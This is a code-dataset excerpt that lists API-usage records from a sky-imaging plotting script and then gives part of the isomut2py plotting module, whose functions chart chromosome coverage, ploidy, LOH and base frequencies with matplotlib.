"usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 472, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 473, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 473, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 474, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 474, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm.get_cmap", "line_number": 481, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 481, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 481, "usage_type": "name"}, {"api_name": "cmocean.cm", "line_number": 482, "usage_type": "attribute"}, {"api_name": "numpy.nanmean", "line_number": 488, "usage_type": "call"}, {"api_name": "numpy.isfinite", "line_number": 492, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 498, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 499, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 500, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 501, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 504, "usage_type": "call"}, {"api_name": "skysol.lib.misc.grid2latlon", "line_number": 505, "usage_type": "call"}, {"api_name": "skysol.lib.misc", "line_number": 505, "usage_type": "name"}, {"api_name": "skysol.lib.misc.grid2latlon", "line_number": 510, "usage_type": "call"}, {"api_name": "skysol.lib.misc", "line_number": 510, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 511, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 540, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 540, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 544, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 544, "usage_type": "name"}, {"api_name": "cv2.cvtColor", "line_number": 546, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2BGR", "line_number": 546, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 548, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 548, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 550, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 550, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 554, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 554, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 556, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 558, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 558, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 558, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 559, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 559, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 563, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 563, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 567, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 567, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 570, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 571, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 571, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 571, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 573, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 573, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 574, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 574, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 581, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 581, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 583, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 584, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 584, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 584, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 586, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 586, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 587, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 587, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 593, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 593, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 594, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 595, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 595, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm.get_cmap", "line_number": 595, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 595, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 596, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 596, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 598, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 598, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 605, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 605, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 607, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 609, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 609, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 610, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 610, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 614, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 614, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 624, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 624, "usage_type": "name"}, {"api_name": "cv2.cvtColor", "line_number": 626, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 626, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 628, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 628, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 634, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 634, "usage_type": "name"}, {"api_name": "cv2.cvtColor", "line_number": 641, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 641, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 643, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 643, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 648, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 648, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 649, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 652, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 652, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 656, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 656, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 657, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 658, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 658, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 659, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 659, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 660, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 660, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 666, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 666, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 667, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 667, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 687, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 687, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 690, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 690, "usage_type": "name"}, {"api_name": "cv2.cvtColor", "line_number": 692, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2BGR", "line_number": 692, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 694, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 694, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 700, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 700, "usage_type": "name"}, {"api_name": "cv2.cvtColor", "line_number": 706, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 706, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 708, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 708, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 714, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 714, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 715, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 715, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 723, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 723, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 725, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 725, "usage_type": "name"}, {"api_name": "time.time", "line_number": 734, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 761, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 761, "usage_type": "name"}, {"api_name": "cv2.cvtColor", "line_number": 764, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2BGR", "line_number": 764, "usage_type": "attribute"}, {"api_name": "scipy.ndimage.interpolation.rotate", "line_number": 767, "usage_type": "call"}, {"api_name": "numpy.degrees", "line_number": 767, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 768, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 768, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 769, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 769, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 770, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 770, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 771, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 771, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 777, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 777, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 778, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 778, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 779, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 779, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 784, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 784, "usage_type": "name"}, {"api_name": "cv2.cvtColor", "line_number": 786, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 786, "usage_type": "attribute"}, {"api_name": "scipy.ndimage.interpolation.rotate", "line_number": 788, "usage_type": "call"}, {"api_name": "numpy.degrees", "line_number": 788, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 791, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 791, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 792, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 792, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 793, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 793, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 794, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 794, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 796, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 796, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 797, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 797, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 798, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 798, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 805, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 805, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm.get_cmap", "line_number": 810, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 810, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 810, "usage_type": "name"}, {"api_name": "cv2.cvtColor", "line_number": 811, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2GRAY", "line_number": 811, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 812, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 827, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 827, "usage_type": "name"}, {"api_name": "cv2.imread", "line_number": 829, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 832, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2GRAY", "line_number": 832, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 834, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 839, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 839, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 840, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 840, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 847, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 855, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 855, "usage_type": "name"}, {"api_name": "datetime.datetime.utcfromtimestamp", "line_number": 863, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 863, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot_date", "line_number": 865, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 865, "usage_type": "name"}, {"api_name": "datetime.datetime.utcfromtimestamp", "line_number": 872, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 872, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot_date", "line_number": 874, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 874, "usage_type": "name"}, {"api_name": "datetime.datetime.utcfromtimestamp", "line_number": 879, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 879, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot_date", "line_number": 880, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 880, "usage_type": "name"}, {"api_name": "datetime.datetime.utcfromtimestamp", "line_number": 888, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 888, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot_date", "line_number": 890, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 890, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 893, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 893, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 895, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 895, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 896, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 896, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 898, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 898, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 900, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 900, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 902, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 902, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 905, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 905, "usage_type": "name"}, {"api_name": "matplotlib.dates.DateFormatter", "line_number": 906, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 907, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 907, "usage_type": "name"}, {"api_name": "datetime.datetime.strftime", "line_number": 913, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 913, "usage_type": "name"}, {"api_name": "datetime.datetime.utcnow", "line_number": 913, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.text", "line_number": 914, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 914, "usage_type": "name"}, {"api_name": "numpy.char.capitalize", "line_number": 914, "usage_type": "call"}, {"api_name": "numpy.char", "line_number": 914, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.draw", "line_number": 920, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 920, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 921, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 921, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 922, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 922, "usage_type": "name"}, {"api_name": "skysol.lib.drawings.sunpath", "line_number": 933, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 937, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 938, "usage_type": "call"}, {"api_name": "skysol.lib.drawings.draw_boundaries", "line_number": 938, "usage_type": "call"}, {"api_name": "scipy.ndimage.interpolation.rotate", "line_number": 939, "usage_type": "call"}, {"api_name": "numpy.degrees", "line_number": 939, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 941, "usage_type": "call"}, {"api_name": "scipy.ndimage.interpolation.rotate", "line_number": 943, "usage_type": "call"}, {"api_name": "numpy.degrees", "line_number": 943, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 945, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 945, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 946, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 946, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 947, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 947, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 948, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 948, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 953, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 953, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 955, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 955, "usage_type": "name"}, {"api_name": "datetime.datetime.strftime", "line_number": 958, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 958, "usage_type": "name"}, {"api_name": "datetime.datetime.strftime", "line_number": 959, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 959, "usage_type": "name"}, {"api_name": "numpy.round", "line_number": 983, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.close", "line_number": 1005, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1005, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 1008, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1008, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 1014, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1014, "usage_type": "name"}, {"api_name": "cv2.cvtColor", "line_number": 1018, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2BGR", "line_number": 1018, "usage_type": "attribute"}, {"api_name": "cv2.circle", "line_number": 1020, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 1022, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 1022, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 1023, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 1023, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 1024, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 1024, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 1025, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 1025, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 1027, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1027, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 1028, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1028, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 1034, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1034, "usage_type": "name"}, {"api_name": "cv2.cvtColor", "line_number": 1036, "usage_type": "call"}, {"api_name": "cv2.COLOR_GRAY2BGR", "line_number": 1036, "usage_type": "attribute"}, {"api_name": "skysol.lib.drawings.cloud_path", "line_number": 1039, "usage_type": "call"}, {"api_name": "skysol.lib.drawings", "line_number": 1039, "usage_type": "name"}, {"api_name": "cv2.circle", "line_number": 1042, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 1045, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1045, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 1046, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1046, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 1046, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 1052, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1052, "usage_type": "name"}, {"api_name": "cv2.cvtColor", "line_number": 1056, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2BGR", "line_number": 1056, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 1057, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1057, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 1058, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1058, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 1062, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1062, "usage_type": "name"}, {"api_name": "skysol.lib.drawings.cloud_path", "line_number": 1065, "usage_type": "call"}, {"api_name": "skysol.lib.drawings", "line_number": 1065, "usage_type": "name"}, {"api_name": "cv2.cvtColor", "line_number": 1067, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2BGR", "line_number": 1067, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 1068, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1068, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 1069, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1069, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 1073, "usage_type": "call"}, {"api_name": "numpy.degrees", "line_number": 1073, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 1078, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1078, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots_adjust", "line_number": 1079, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1079, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.draw", "line_number": 1080, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1080, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 1081, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1081, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 1082, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1082, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 1083, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1083, "usage_type": "name"}]} +{"seq_id": "32467814491", "text": "try:\n from isomut2py import io\n\n import matplotlib as __mpl\n\n __mpl.use('Agg')\n import matplotlib.pyplot as __plt\n from matplotlib.patches import Rectangle as __Rectangle\n import base64 as __base64\n import numpy as __np\n from io import BytesIO as __BytesIO\n import os as __os\n import pandas as __pd\n from datetime import datetime as __datetime\n from scipy import stats as __stats\n import seaborn as __sns\nexcept ImportError:\n print('ImportError in isomut2py.plot, some plotting functions might not work.')\n\n\ndef plot_karyotype_for_chrom(chrom, df, return_string=True):\n \"\"\"\n\n Plots karyotype information (coverage, estimated ploidy, estimated LOH, reference base frequencies) about the sample for a given chromosome.\n\n :param chrom: The chromosome to plot. (str)\n :param df: The dataframe containing ploidy and LOH information. (pandas.DataFrame)\n :param return_string: If True, only a temporary plot is generated and its base64 code is returned, that can be included in HTML files. (default: True) (bool)\n\n :returns: If the return_string value is True, a base64 encoded string of the image. Otherwise, a matplotlib figure.\n\n \"\"\"\n try:\n __sns.set(style=\"whitegrid\", font=\"DejaVu Sans\")\n except:\n pass\n\n covcolor = '#FFA500' # '#FFD700'\n rnfcolor = '#ADD8E6' # '#483D8B' # (209 / 255., 10 / 255., 124 / 255.)\n rnfalpha = 0.4\n guidelinecolor = '#E6E6FA'\n\n p = list(df.sort_values(by='pos')['pos'])\n cov = list(df.sort_values(by='pos')['cov'])\n rf = list(df.sort_values(by='pos')['mut_freq'])\n rf = list(1 - __np.array(rf))\n pl = list(df.sort_values(by='pos')['ploidy'])\n pl_i = list(float(1) / __np.array(pl))\n loh = __np.array(list(df.sort_values(by='pos')['LOH']))\n loh_change = __np.where(loh[:-1] != loh[1:])[0]\n\n f, ax1 = __plt.subplots()\n f.set_size_inches(20, 10)\n ax2 = ax1.twinx()\n for i in range(len(loh_change)):\n if (i == 0 and loh[loh_change[i]] == 1):\n w = p[loh_change[i]] - p[0]\n k = __Rectangle((p[0], 0), w, 1, alpha=0.1, facecolor='black', edgecolor='none')\n ax2.add_patch(k)\n if (loh[loh_change[i]] == 0):\n if (i == len(loh_change) - 1):\n w = max(p) - p[loh_change[i]]\n else:\n w = p[loh_change[i + 1]] - p[loh_change[i]]\n k = __Rectangle((p[loh_change[i]], 0), w, 1, alpha=0.1, facecolor='black', edgecolor='none')\n ax2.add_patch(k)\n\n ax1.plot(p, cov, c=covcolor)\n\n for i in range(2, 10):\n ax2.plot(p, [1 - float(1) / i] * len(p), c=guidelinecolor)\n ax2.plot(p, [float(1) / i] * len(p), c=guidelinecolor)\n ax2.scatter(p, rf, c='none', edgecolor=rnfcolor, alpha=rnfalpha)\n ax2.scatter(p, pl_i, c='none', edgecolor='black', alpha=1)\n\n ax2.set_ylabel('reference base frequency\\n', size=15, color=rnfcolor)\n ax1.set_xlabel('\\n\\ngenomic position', size=15)\n ax2.yaxis.set_tick_params(labelsize=15, colors=rnfcolor)\n ax2.xaxis.set_tick_params(labelsize=15)\n ax1.xaxis.set_tick_params(labelsize=15)\n ax1.set_ylabel('coverage\\n', size=15, color=covcolor)\n ax1.yaxis.set_tick_params(labelsize=15, colors=covcolor)\n ax1.set_ylim([0, 1000])\n ax2.set_ylim([0, 1])\n ax2.set_xlim([min(p), max(p)])\n ax1.spines['bottom'].set_color('lightgrey')\n ax1.spines['top'].set_color('lightgrey')\n ax1.spines['left'].set_color('lightgrey')\n ax1.spines['right'].set_color('lightgrey')\n ax2.spines['bottom'].set_color('lightgrey')\n ax2.spines['top'].set_color('lightgrey')\n ax2.spines['left'].set_color('lightgrey')\n ax2.spines['right'].set_color('lightgrey')\n __plt.title('Chromosome: ' + chrom + '\\n\\n', size=20)\n\n if (return_string):\n figfile = __BytesIO()\n __plt.savefig(figfile, bbox_inches='tight', format='png')\n __plt.close()\n figfile.seek(0)\n figdata_png = __base64.b64encode(figfile.getvalue())\n return figdata_png\n else:\n __plt.show()\n __plt.close()\n return f\n\n\ndef plot_karyotype_for_all_chroms(chromosomes, output_dir, return_string=False):\n \"\"\"\n\n Plots karyotype information (coverage, estimated ploidy, estimated LOH, reference base frequencies) about the sample for all analysed chromosomes.\n\n :param chromosomes: the list of chromosomes to plot (list of str)\n :param output_dir: the path to the directory where PE_fullchrom_[chrom].txt files are stored. (str)\n :param return_string: If True, only a temporary plot is generated and its base64 code is returned, that can be included in HTML files. (default: True) (bool)\n\n :returns: If the return_string value is True, a base64 encoded string of the image. Otherwise, nothing.\n\n \"\"\"\n\n all_chrom_figfiles = []\n for c in chromosomes:\n if not 